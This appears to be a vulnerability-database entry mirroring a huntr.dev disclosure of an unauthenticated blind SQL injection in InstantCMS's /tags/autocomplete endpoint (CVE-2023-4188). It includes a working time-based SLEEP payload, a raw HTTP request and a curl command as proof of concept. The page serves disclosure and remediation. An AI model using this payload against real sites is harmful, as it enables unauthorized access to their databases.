Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrLegpainsFE9809B6-40AD-4E81-9197-A9AA42E8A7BF
HistoryAug 02, 2023 - 4:31 a.m.

Unauthenticated Blind SQL Injection in '/tags/autocomplete'

2023-08-0204:31:42
legpains
www.huntr.dev
13
unauthenticated attacker
sql injection
sanitize parameter

EPSS

0.001

Percentile

49.6%

JSON

Description

The application was found to be vulnerable to an unauthenticated blind SQL injection in the /tags/autocomplete page.
The GET parameter term does not sufficiently sanitize input.

Proof of Concept

  1. Make a GET request to http://icms.local/tags/autocomplete?term=')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1=' and observe that the server responds to the time delay.
GET /tags/autocomplete?term=')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1=' HTTP/1.1
Host: icms.local
X-Requested-With: XMLHttpRequest
  1. Replace hostname below where necessary
curl -i -s -k -X $'GET' \
    -H $'Host: icms.local' -H $'X-Requested-With: XMLHttpRequest' \
    $'http://icms.local/tags/autocomplete?term=\')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1=\''
  1. As long as X-Requested-With: XMLHttpRequest is in the HTTP request headers, an unauthenticated attacker can make the request directly to inject into the affected parameter.

Remedial Action

It is recommended to sanitize the affected parameter term.

Related

cvelist 1
osv 1
nvd 1
cve 1
prion 1
cvelist
cvelist
CVE-2023-4188 SQL Injection in instantsoft/icms2
2023-08-05 19:10:37
osv
osv
CVE-2023-4188
2023-08-05 20:15:09
nvd
nvd
CVE-2023-4188
2023-08-05 20:15:09
cve
cve
CVE-2023-4188
2023-08-05 20:15:09
prion
prion
Sql injection
2023-08-05 20:15:00

EPSS

0.001

Percentile

49.6%

JSON
Related for FE9809B6-40AD-4E81-9197-A9AA42E8A7BF
cvelist1osv1nvd1cve1prion1